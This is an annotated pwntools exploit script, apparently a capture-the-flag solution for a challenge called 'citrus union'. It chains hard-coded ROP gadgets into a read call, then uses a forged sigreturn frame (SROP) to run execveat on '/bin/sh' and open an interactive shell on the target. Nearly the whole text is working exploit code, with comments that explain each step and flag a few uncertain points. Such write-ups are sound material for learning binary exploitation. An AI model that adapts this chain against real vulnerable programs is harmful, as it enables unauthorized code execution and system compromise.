exploit.py for citrus union
# Connect to the challenge target. `start()` is not defined in this gist;
# presumably the pwntools template helper that spawns a local process or
# opens a remote socket depending on the script's arguments — verify.
io = start()
# Gadget addresses inside the challenge binary. The names are the author's;
# the exact instructions behind each address are not visible here.
# Addresses in the 0x400xxx range suggest a non-PIE binary with fixed
# gadget locations, which is what makes this hard-coded chain possible.
zero_rsi = 0x400134
add_rsi = 0x400126
syscall = 0x400123
read = 0x40011c
# shellcode = asm(shellcraft.sh())
# payload = fit({
# 32: 0xdeadbeef,
# 'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)
# First stage: a return-oriented chain of gadget addresses.
# Order: clear rsi once, run the add_rsi gadget ten times, then read, then
# syscall. Given that frame.rsi below is `0xccccccc9666*10`, add_rsi
# presumably adds 0xccccccc9666 each time, so rsi ends up at that value —
# TODO confirm against the gadget's disassembly.
buf = p64(zero_rsi)
buf += p64(add_rsi)*10
buf += p64(read)
buf += p64(syscall)
#f = open("o", "wb")
#f.write(buf)
#f.close()
print("lemon")
# Second stage, appended to the same payload: a forged signal frame
# (SROP). When the `syscall` gadget runs rt_sigreturn, the kernel restores
# every register from this frame, giving the attacker full register control
# without needing additional gadgets.
frame =SigreturnFrame()
# Linux x86-64 syscall number 322 is execveat(dirfd, pathname, argv, envp, flags).
frame.rax = 322
# dirfd = 0; ignored by the kernel when pathname is absolute (the "/bin/sh"
# sent below), so any value works here.
frame.rdi = 0
# pathname pointer — the same address the add_rsi loop is expected to
# produce, i.e. where the later read() deposits "/bin/sh\x00".
frame.rsi = 0xccccccc9666*10
# argv pointer, 100 bytes past the pathname. Whatever lies there is used as
# argv; the frame's remaining registers (r10 = envp/flags etc.) are left
# at SigreturnFrame's defaults — presumably zero, verify.
frame.rdx = (0xccccccc9666*10)+100
# After sigreturn, execution resumes at the syscall gadget, which now runs
# execveat with the registers above.
frame.rip = syscall
buf += bytes(frame)
io.sendline(buf)
import time
# Crude synchronisation: give the target time to consume the first payload
# before the second input is sent. Fragile under load; a recv-based sync on
# the target's output would be more reliable.
time.sleep(0.1)
# Second input, padded to exactly 0xf = 15 bytes. The read() in the chain
# returns the byte count in rax, and 15 is rt_sigreturn on x86-64, so the
# following `syscall` gadget consumes the forged frame above. If the length
# changed, the chain would break — the padding is load-bearing.
buf = b"/bin/sh\x00"
buf += b"A"*(0xf-len(buf))
io.send(buf)
io.interactive()